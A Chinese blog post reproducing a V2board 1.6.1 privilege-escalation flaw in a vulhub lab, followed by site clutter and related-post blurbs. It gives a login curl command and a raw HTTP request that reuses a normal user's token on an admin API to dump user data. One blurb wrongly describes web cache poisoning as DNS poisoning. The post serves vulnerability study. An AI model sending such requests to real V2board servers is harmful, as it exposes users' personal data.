V2board 1.6.1 提权漏洞(web缓存投毒)

最新推荐文章于 2024-12-13 23:42:39 发布
最新推荐文章于 2024-12-13 23:42:39 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63069714/article/details/130993994
版权

目录

复现环境:

漏洞产生的原因:

漏洞的利用以及复现:

复现环境:

在gethub中直接拉去docker镜像

vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub

漏洞产生的原因:

前端的认证方式与后端并没有进行区分,导致前端认证方式和后端认证方式被同一个健全接口所利用,而这个健全接口没有去区分到底是普通用户还是管理员,从而产生了此漏洞。

漏洞的利用以及复现:

用户自己注册一个账户,通过访问如下这样一个curl来进行获取我们的认证信息(其中邮箱和密码是自己注册时的邮箱和密码)

curl -i -s -k -XPOST --data-binary "email=example%40example.com&password=a123123123" http://localhost:9090/api/v1/passport/auth/login

服务器会返回当前用户的认证信息"auth_data":

拷贝这个认证信息,并替换到如下数据包中

GET /api/v1/admin/user/fetch HTTP/1.1
Host: 192.168.75.142:9090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.89070671.1685615036; _ga_P1E9Z5LRRK=GS1.1.1685615036.1.1.1685615363.0.0.0
Authorization:eHVqaWFsb25nMDQyNkAxNjMuY29tOiQyeSQxMCRzVDJpUU4vcUZ4SXFnOURzZ09GTFB1bTZYRnB1cXQ0S0tFc0FLNlZCWFhlUHdSc3NmS0dnYQ==
Connection: close

通过burpsuite进行抓包,修改Request请求包中的内容

 可以看到爆出了数据

V2Board机场项目数据泄露,超过400万条记录遭受泄露风险
syntax_loop446的博客
09-20 752
然而,这个项目最近遭到了严重的安全漏洞,使得用户的数据面临泄露风险。总结而言,数据泄露是一个严重的安全威胁,对用户和整个项目都造成了风险。为了确保敏感数据的安全,开发者和系统管理员应该采取适当的安全措施,如数据加密、访问控制、安全审计和输入验证。数据泄露是一个严重的问题,可能导致用户的敏感信息暴露给未经授的人员。在实际应用中,存储哈希密码时应该采用更复杂的方法,如加盐(salt)处理,以增加密码的安全性。开发者应该对用户输入进行验证和过滤,以防止常见的安全漏洞,如SQL注入和跨站脚本攻击。
V2board缓存投毒漏洞复现
qq_57094995的博客
08-18 1814
缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系统表中的地址,进而制造破坏。当网络用户在带有该虚假地址的页面中进行搜寻,以访问某链接时,网页浏览器由于受到该虚假条目的影响而打开了不同的网页链接。在这种情况下,蠕虫、木马、浏览器劫持等恶意软件就可能会被下载到本地用户的电脑上。------百度。
github_v2board_v2board
02-17
V2板 PHP7.3 + 作曲家 MySQL5.5 + 雷迪斯 Laravel 演示版 文档 捐款 ETH&(USDT-ERC20):0x84F85A89105B93F74c3b5db6410Ee8630F01063f 赞助商 感谢供的开源项目许可证 其他 电报频道:
最新V2Board 面板设置教程()
12-08 2404
打开Telegram——搜索:@BotFather——点击开始——输入/newbot——给机器人起一个名字——给机器人设定一个用户名(后缀加上_bot,如:Mtelegram_bot)——复制机器人API——回到V2board面板——点击。
复现B-漏洞复现
qq_51926773的博客
11-28 4458
一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 110 日, 锦行信息安全公众号公开了一个关于 D.
某开源管理平台越访问漏洞复现
tpaer的博客
12-28 1479
某开源的管理平台,该漏洞可导致普通用户越访问调用管理员的API。
推荐开源项目:V2Board-theme-LuFly - 优雅的V2Board主题皮肤
gitblog_00020的博客
06-01 1220
推荐开源项目:V2Board-theme-LuFly - 优雅的V2Board主题皮肤 v2board-theme-LuFlyV2board前端展示页项目地址:https://gitcode.com/gh_mirrors/v2b/v2board-theme-LuFly 1、项目介绍 在开放源代码的世界里,个性化的界面设计总能给用户体验带来新的惊喜。V2Board-theme-LuFly 是一款针...
推荐项目:V2board一键部署方案,打造轻松管理新时代!
gitblog_00595的博客
08-21 855
推荐项目:V2board一键部署方案,打造轻松管理新时代! 项目地址:https://gitcode.com/gh_mirrors/v2b/v2board_install 在当今高速发展的互联网环境中,对于技术爱好者和运维人员来说,快速高效地部署和管理服务成为了不可或缺的能力。今天,我们向您隆重推荐一款开源神器——V2board一键部署。这是一款专为简化V2board平台搭建过程而设计的脚本,旨在...
V2Board 安装项目教程
gitblog_01175的博客
08-20 566
V2Board 安装项目教程 项目地址:https://gitcode.com/gh_mirrors/v2b/v2board_install 1. 项目的目录结构及介绍 V2Board 安装项目的目录结构如下: v2board_install/ ├── README.md ├── install.sh ├── config/ │ ├── app.example.yaml │ └── dat...
V2Board后台登录时:请求失败遇到了些问题,我们正在进行处理
无心
02-05 2834
查看数据库发现数据库中有V2Board的内容,排除数据库没有对上的问题。查看网站日志发现xxx 500,表示服务器内部错误。
v3board-user:v2board用户前端
04-16
蚂蚁设计专业版 该项目已使用初始化。 遵循是如何使用的快速指南。 环境准备 安装node_modules : npm install 或者 yarn 供的脚本 Ant Design Pro供了一些有用的脚本,可帮助您快速启动和构建Web项目,代码样式检查和测试。 package.json供的脚本。 修改或添加其他脚本是安全的: 开始项目 npm start 建立项目 npm run build 检查代码样式 npm run lint 您还可以使用脚本自动修复某些皮棉错误: npm run lint:fix 测试码 npm test 更多的 您可以在我们的上查看完整文档。 并欢迎在我们的任何反馈。
V2board一键部署项目技术文档
gitblog_01266的博客
10-18 1269
V2board一键部署项目技术文档 v2board_install V2board一键部署 项目地址: https://gitcode.com/gh_mirrors/v2b/v2board_install ...
V2B管理平台搭建完全教程
热门推荐
weixin_36532747的博客
03-28 1万+
## V2B管理平台搭建完全教程 ### V2B搭建 参考链接地址: https://zhujiget.com/4501.html ### soga接入trojan #### 1  申请独立的vps        地址: https://my.vultr.com/        #### 2  注册域名&账号   &nbs
V2board一键部署指南:从零开始搭建Web管理面板
最新发布
m0_74824076的博客
12-13 1205
V2board是一款基于Web的管理面板,专为特定服务供便捷的管理界面。此项目通过供的一键部署脚本简化了安装流程,特别适合没有深厚技术背景的用户。项目托管于GitHub,具体位于,采用的主要编程语言及配置文件主要是Shell脚本,用于自动化部署一系列依赖服务。至此,您已成功部署了V2board管理面板。记得检查日志文件以防遇到问题,日志路径会在安装结束时给出,以便于调试。遇到困难时,可通过项目页面上的联系方式寻求帮助。祝您使用愉快!请注意。
探索V2BoardBot:一个智能社区管理解决方案
gitblog_00013的博客
04-05 335
探索V2BoardBot:一个智能社区管理解决方案 去发现同类优质开源项目:https://gitcode.com/ 是一个基于GitHub的开源项目,设计用于自动化论坛和社区的管理工作。它的核心是利用人工智能和自然语言处理技术,帮助管理员更高效、准确地维护社区秩序,同时减轻日常繁琐的任务负担。 技术分析 自然语言处理(NLP): V2BoardBot内置了先进的NLP模块,能够理解和解析用户...
V2board一键部署项目推荐
gitblog_01250的博客
10-18 370
V2board一键部署项目推荐 v2board_install V2board一键部署 项目地址: https://gitcode.com/gh_mirrors/v2b/v2board_install ...
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 564
Discuz-命令执行(wooyun-2010-080723)漏洞复现
最新V2board面板支付设置()
12-08 2147
支付方式一(推荐):支付方式二:支付方式三:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值